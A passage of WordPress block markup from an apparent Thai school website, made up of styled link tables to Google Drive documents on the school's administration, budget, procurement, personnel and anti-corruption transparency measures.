{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b